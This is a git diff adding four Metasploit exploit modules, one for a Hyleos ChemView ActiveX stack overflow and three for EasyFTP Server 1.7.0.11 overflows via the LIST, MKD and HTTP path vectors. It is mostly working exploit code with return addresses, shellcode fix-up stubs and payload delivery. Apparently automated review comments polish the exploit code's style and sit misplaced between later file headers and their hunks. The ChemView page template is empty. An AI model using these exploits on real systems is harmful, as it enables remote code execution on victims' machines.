diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb new file mode 100644 index 0000000000..57bdf9381d --- /dev/null +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb 
@@ -0,0 +1,139 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking # heap spray :-/ + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Hyleos ChemView ActiveX Control Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos + ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods + with an overly long first argument, an attacker can overrun a buffer and execute + arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Paul Craig ', # original discovery/advisory + 'Dz_attacker ', # original file format module + 'jduck' # converted HttpServer module + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2010-0679' ], + [ 'OSVDB', '62276' ], + [ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ], + [ 'URL', 'http://www.exploit-db.com/exploits/11422/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ] + ], + 'DisclosureDate' => 'Feb 10 2010', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + + clsid = "C372350A-1D5A-44DC-A759-767FC553D96C" + progid = "HyleosChemView.HLChemView" + + methods = [ "ReadMolFile", "SaveAsMolFile" ] + method 
= methods[rand(methods.length)] + method = "SaveAsMolFile" + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # It may be possible to create a more robust exploit, however -- + # 1. The control's base address has been shown to vary (seen at 0x1c90000 and 0x1d90000) + # 2. The buffer overflow does not appear to be entirely straight forward. + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch)) + + # Setup exploit buffers + nops = Rex::Text.to_unescape([target.ret].pack('V')) + ret = Rex::Text.uri_encode([target.ret].pack('L')) + blocksize = 0x40000 + fillto = 300 + offset = target['Offset'] + + # Randomize the javascript variable names + chemview = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) + j_nops = rand_text_alpha(rand(100) + 1) + j_ret = rand_text_alpha(rand(100) + 1) + j_headersize = rand_text_alpha(rand(100) + 1) + j_slackspace = rand_text_alpha(rand(100) + 1) + j_fillblock = rand_text_alpha(rand(100) + 1) + j_block = rand_text_alpha(rand(100) + 1) + j_memory = rand_text_alpha(rand(100) + 1) + j_counter = rand_text_alpha(rand(30) + 2) + + content = %Q| + + +| + + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb new file mode 100644 index 0000000000..9476bd2963 --- /dev/null +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb 
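Review bot: In on_request_uri the randomly chosen `method` is overwritten on the very next line by `method = "SaveAsMolFile"`, so the `methods` array and the `rand` pick are dead code; either drop the override or drop the random selection, and if the hard-coded value is a leftover from testing, say so in a comment. The nil test two lines later reads more idiomatically as `return unless (p = regenerate_payload(cli))`. The `content` template shows as an empty `%Q| |` literal in this view, which looks like an extraction artifact rather than the committed file, so the generated markup could not be reviewed here.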
@@ -0,0 +1,127 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +## +# EDB-ID: 14400 +# Date : July 5, 2010 +# Discovered by : Karn Ganeshen +# Version : 1.7.0.11 +# Tested on : Windows XP SP3 Version 2002 +# MFR & VAS TEAM : just testing howto convert exploits to metasploit modules. +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. + credit goes to Karn Ganeshan. + + NOTE: Although, this is likely to exploit the same vulnerability as the + 'easyftp_cwd_fixret' exploit, it uses a slightly different vector. + }, + 'Author' => + [ + 'Karn Ganeshan ', # original version + 'MFR', # convert to metasploit format. 
+ 'jduck' # modified to use fix-up stub (works with bigger payloads) + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '62134' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14400/' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14451/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x0a\x0d\x2f\x5c", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 - Version 2002', { 'Ret' => 0x7e49732b } ], # call edi from user32.dll (v5.1.2600.5512) + ], + 'DisclosureDate' => 'July 5 2010', + 'DefaultTarget' => 0)) + end + + def check + connect + disconnect + + if (banner =~ /BigFoolCat/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + connect_login + + # NOTE: + # This exploit jumps to edi, which happens to point at a partial version of + # the 'buf' string in memory. The fixRet below fixes up the code stored on the + # stack and then jumps there to execute the payload. The value in esp is used + # with an offset for the fixup. 
+ fixRet_asm = %q{ + mov edi,esp + mov [edi], 0xfeedfed5 + add edi, 0xfffffff4 + mov byte ptr [edi], 0xc0 + add edi,4 + mov [edi], 0xdeadbeef + add edi, 0xffffff24 + add esp, 0xfffffe04 + jmp edi + } + fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string + + buf = '' + + print_status("Prepending fixRet...") + buf << fixRet + buf << make_nops(0x30 - buf.length) + + print_status("Adding the payload...") + buf << payload.encoded + + # Patch the original stack data into the fixer stub + buf[4, 4] = buf[268 + 8, 4] + buf[16, 1] = buf[268-4, 1] + buf[22, 4] = buf[268, 4] + + print_status("Overwriting part of the payload with target address...") + buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes + + print_status("Sending exploit buffer...") + send_cmd( ['LIST', buf] , false) + + handler + disconnect + end + +end diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb new file mode 100644 index 0000000000..ac74b7b584 --- /dev/null +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb 
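Review bot: `'DisclosureDate' => 'July 5 2010'` uses a different date format from the other three modules in this commit (`'Feb 10 2010'`, `'Apr 04 2010'`, `'Feb 18 2010'`); if the framework parses this field it may reject the long month name, so `'DisclosureDate' => 'Jul 05 2010'` is the safer spelling. The `check` method's parenthesised `if (banner =~ /BigFoolCat/)` with explicit returns can be collapsed to `banner =~ /BigFoolCat/ ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe`, and it relies on `banner` still being populated after `disconnect`, which is presumably how the Ftp mixin behaves but deserves a one-line comment. The Description's sentence "credit goes to Karn Ganeshan." duplicates the Author list and reads as a leftover from the original script.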
@@ -0,0 +1,129 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 + and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which + leads to a stack based buffer overflow. + + NOTE: EasyFTP allows anonymous access by default. However, in order to access the + 'MKD' command, you must have access to an account that can create directories. + + After version 1.7.0.12, this package was renamed "UplusFtp". + + This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. + This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by + 'fixing' the return address post-exploitation. See references for more information. 
+ }, + 'Author' => + [ + 'x90c', # original version + 'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads) + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '62134' ], + [ 'URL', 'http://www.exploit-db.com/exploits/12044/' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14399/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x0a\x0d\x2f\x5c", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe + ], + 'DisclosureDate' => 'Apr 04 2010', + 'DefaultTarget' => 0)) + end + + def check + connect + disconnect + + if (banner =~ /BigFoolCat/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def make_nops(num); "C" * num; end + + def exploit + connect_login + + # NOTE: + # This exploit jumps to ebp, which happens to point at a partial version of + # the 'buf' string in memory. 
The fixRet below fixes up the code stored on the + # stack and then jumps there to execute the payload. The value in esp is used + # with an offset for the fixup. + fixRet_asm = %q{ + mov edi,esp + sub edi, 0xfffffe10 + mov [edi], 0xfeedfed5 + add edi, 0xffffff14 + jmp edi + } + fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string + + buf = '' + + print_status("Prepending fixRet...") + buf << fixRet + buf << make_nops(0x20 - buf.length) + + print_status("Adding the payload...") + buf << payload.encoded + + # Patch the original stack data into the fixer stub + buf[10, 4] = buf[268, 4] + + print_status("Overwriting part of the payload with target address...") + buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes + + print_status("Sending exploit buffer...") + send_cmd( ['MKD', buf] , false) + + handler + disconnect + end + +end diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb new file mode 100644 index 0000000000..e13e78db49 --- /dev/null +++ b/modules/exploits/windows/http/easyftp_list.rb 
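Review bot: `def make_nops(num); "C" * num; end` replaces the `make_nops` helper the mixins otherwise supply (inferred from its use further down) with a fixed filler byte, and nothing says why; add a comment above it such as `# Override the framework's NOP generator with a fixed filler byte (reason: …)` with the actual reason filled in, and write it as a normal multi-line def to match the rest of the file. Inside `%q{ ... }` the sequence `I\'ve` in the Description is not an escape, so the backslash will most likely survive into the displayed text; drop it or use a double-quoted form. The `check` method is a verbatim copy of the one in easyftp_list_fixret.rb and the same simplification to a single conditional expression applies.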
@@ -0,0 +1,127 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 + and earlier. EasyFTP fails to check input size when parsing the 'path' parameter + supplied to an HTTP GET request, which leads to a stack based buffer overflow. + EasyFTP allows anonymous access by default; valid credentials are typically + unnecessary to exploit this vulnerability. + + After version 1.7.0.12, this package was renamed "UplusFtp". + + Due to limited space, as well as difficulties using an egghunter, the use of + staged, ORD, and/or shell payloads is recommended. + }, + 'Author' => + [ + 'ThE g0bL!N', # Original exploit [see References] + 'jduck' # Metasploit re-implementation + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://www.exploit-db.com/exploits/11500/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 256, + 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 - Easy FTP Server Universal', + # NOTE: It's not possible to use addresses within the + # binary due to the nul byte. 
+ { + 'Ret' => 0x7cc5d507 # jmp esp in shell32.dll + #'Ret' => 0xdeadbeef + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 18 2010' + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + ], self.class) + end + + def check + info = http_fingerprint # check method + if info and (info =~ /Easy-Web Server\//) + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe + end + + + def exploit + if (payload.encoded.length > payload_space) + raise RuntimeError, "Insufficient space for payload, try using a staged, ORD and/or shell payload." + end + + # Fix up ESP, jmp to the beginning of the buffer + stub_asm = %q{ + mov edi, esp + add esp, 0xfffffc04 + add edi, 0xfffffee8 + jmp edi + } + stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string + + # Build the path up + path = '' + path << payload.encoded + path << rand_text(268 - path.length) + # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect. + path << [target.ret].pack('V') + path << rand_text(280 - path.length) + path << stub + path << rand_text(332 - path.length) + + uri = "/list.html?path=" + uri << path + + print_status("Trying target #{target.name}...") + res = send_request_raw({ 'uri' => uri }, 5) + + if (res) + print_error("The server unexpectedly responded, this is not good.") + print_status(res.inspect) + end + + handler + end + +end
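Review bot: The `check` method's `if info and (info =~ /Easy-Web Server\//)` uses `and` for boolean logic, which binds more loosely than `=` and is a standing precedence trap; write it as `if info && info =~ /Easy-Web Server\//`. The commented-out `#'Ret' => 0xdeadbeef` inside the target hash is a debugging leftover and should be removed rather than shipped, and `if (res)` can lose its parentheses to match Ruby style. When `res` is non-nil the code prints `res.inspect` as a status line, which can be verbose for an HTTP response object; consider logging only `res.code` or moving the dump to `vprint_status` if that helper is available in this framework version.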